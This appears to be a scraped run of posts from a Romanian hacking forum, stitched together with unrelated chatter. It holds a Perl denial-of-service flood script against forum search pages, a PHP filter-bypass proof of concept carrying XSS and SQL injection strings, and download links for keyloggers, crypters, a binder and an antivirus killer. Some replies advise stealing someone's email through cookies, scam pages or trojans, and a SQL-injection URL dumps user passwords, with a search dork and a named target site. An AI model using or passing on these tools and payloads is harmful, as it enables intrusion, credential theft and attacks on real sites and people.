#!"c:\perl\bin\perl.exe" use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) { $user="h4x0r".$rand.$i; $data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; $len = length $data; $foo = "POST ".$dir."search.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "|" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 /forum/\n"; print "\tex2: $0 / (if there isn't a dir)\n\n"; print "\th4x0r Security Team\n"; print "\twww.h4x0r.ir\n\n"; exit(); };
dupa click here scrie immonitor . com << sunt niste spatii inainte de . si dupa . si d'asta nu merge iar link-ul bun este http://immonitor.com/
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT "; $url = ""; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf "); unlink("outtest.fdf"); $params = array('http' => array( 'method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf' )); $ctx = stream_context_create($params) ; $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open $url"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?> //
Download: http://rapidshare.com/files/41046993/Enigma.rar
Sa ii afli parola nu cred ca exista dar ... poti intra pe mailul cuiva cu acele cookies ... da De ce zici ca nu poti sa ii afli parola? Poti sa folosesti o pagina scam sau un trojan sau un keylogger...
What's new since the 4.0.2? client now more stable speeded up transfer manager added password retrieval changed keylogger updates as soon as keys are pressed fixed offline keylogger problem Download: http://rapidshare.com/files/41034903/Slh_4.0.3.rar
Pestil v1.0 _____________________ Basically drag and drop your file or you can use 'Select File' button.Choose your settings and protect the file. Settings _________ - Preserve EOF Data : Pestil will automatically dedect if there is any data end of the file.And this option will be automatically checked.If you don't want to preserve EOF data uncheck this option. - Strip Reloc : If you check this option,Pestil will remove reloc section from the file,it can make your applications smaller. - Encrypt Stub : This will remove some tags from packed file,i don't suggest using it - Don't pack file : If you select this option,you file won't be compressed,it will be crypted also. - Version Info : You can preserve version info and you can use other program's version info with pestil. - Icon Settings : You can change application icon before protecting your file. [+]IF GET ANY ERRORS WHILE PROTECTING,SELECT "SAFE MODE" IN AGREEMENT PAGE Download: http://rapidshare.com/files/40997706/Pestil.rar
Merge perfect! Download: http://rapidshare.com/files/40967733/Simple_Crypter_v1.0.rar
Cu ajutorul acestui program puteti face un fisier .exe sa inchida Kaspersky... bineinteles ca victima trebuie sa ruleze fisierul creeat de voi. Download: http://rapidshare.com/files/40967100/Anti_Kaspersky_v1.1.rar
Click dreapta sub "File Name" pentru a adauga fisierele care doriti sa le bindati. Download: http://rapidshare.com/files/40965294/Themis_Binder_v0.2.rar
Inca nu am testat... Download: http://rapidshare.com/files/40842303/G_X_s_Protector_v1.2.rar
As vrea si eu un avatar daca se poate... sa fie ceva cu Ras... in rest pui tu ce vrei dupa ce termini site-ul sa ne dai si noua adresa ...
e veche rau melodia dar e tare.
tot caterinca la romani )) http://www.youtube.com/watch?v=aY89PuAOWhw&mode=related&search=
Found by E.Minaev (underwater@itdefence.ru) ITDefence.ru 1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off). ------------------------------------------ "$sql = "select * from $tblUsers where login = '$login'"; if ( $login != $row['login'] ) $valid_user = 0; if ( $password != $row['password'] ) $valid_user = 0;" ------------------------------------------ 2) Remote File Inclusion (RFI) /includes/sessions.php?wb_class_dir=shell?
Download: http://rapidshare.com/files/40573692/Themida_v1.9.1.0.rar
Download: http://rapidshare.com/files/40567204/MorphBeta.rar
Uita-te la Programe H4ck si gasesti acolo si trojeni si keyloggere. Foloseste si tu "Cautare" este sus de tot langa "Pagina Principala"
puteai sa cauti si tu pe forum... poti folosi un keylogger, un trojan, o pagina scam.
cred ca trebuie sa spunem de ce 5+5+5 = 550
pune-l si tu aici
Site : [url]www.avscripts.net[/url] Dork : "Powered By AV Arcade" Exploit: http://site.com/index.php?cat_id=NumOfCatgorey/**/union/**/select/**/1,concat(char(32,%2032,%2032,%2032,%2032,%2032,%2032,%2032,32,32,32,32,32),username,char(58,58,58),password)/**/from/**/ava_users/**/where%20id=Uid Example: [url]http://www.gotovski.cool-bg.co.uk[/url] Admin Panel : site.com/admin/ Found By : WaReZ